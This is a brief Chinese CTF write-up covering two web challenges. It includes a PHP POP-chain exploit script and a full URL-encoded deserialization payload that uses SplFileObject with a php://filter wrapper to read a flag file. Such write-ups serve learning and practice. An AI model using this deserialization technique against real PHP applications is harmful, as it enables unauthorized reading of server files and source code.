萌新第一次打省赛

Web

题目一名称 Checkin

直接访问 Burp抓包即可得到flag

1.png

题目二名称 pppop

Pop链的exp:

<?php
class A1{
    public $tmp1;
    public $tmp2;
}
class A3{
}
class A4{
    public $tmp1;
}
class A6{
    public $tmp1;
}
class A8{
}
$a1 = new A1();
$a3 = new A3();
$a4 = new A4();
$a6 = new A6();
$a8 = new A8();
$a1->tmp1=$a3;
$a3->tmp2=$a4;
$a4->tmp1=$a6;
$a6->tmp1=$a8;
echo urlencode(serialize($a1));

这时候会执行echo new $this->tmp1($this->tmp2);

使用GlobIterator匹配通配符读文件

2.png

flag在flaggggggggggg.php中

SplFileObject+伪协议读文件

3.png

?DASCTF=O%3A2%3A%22A1%22%3A2%3A%7Bs%3A4%3A%22tmp1%22%3BO%3A2%3A%22A3%22%3A1%3A%7Bs%3A4%3A%22tmp2%22%3BO%3A2%3A%22A4%22%3A1%3A%7Bs%3A4%3A%22tmp1%22%3BO%3A2%3A%22A6%22%3A1%3A%7Bs%3A4%3A%22tmp1%22%3BO%3A2%3A%22A8%22%3A0%3A%7B%7D%7D%7D%7Ds%3A4%3A%22tmp2%22%3BN%3B%7D&DAS=SplFileObject&CTF=php://filter/convert.base64-encode/resource=flaggggggggggg.php

base64解码即可得到flag

Q.E.D.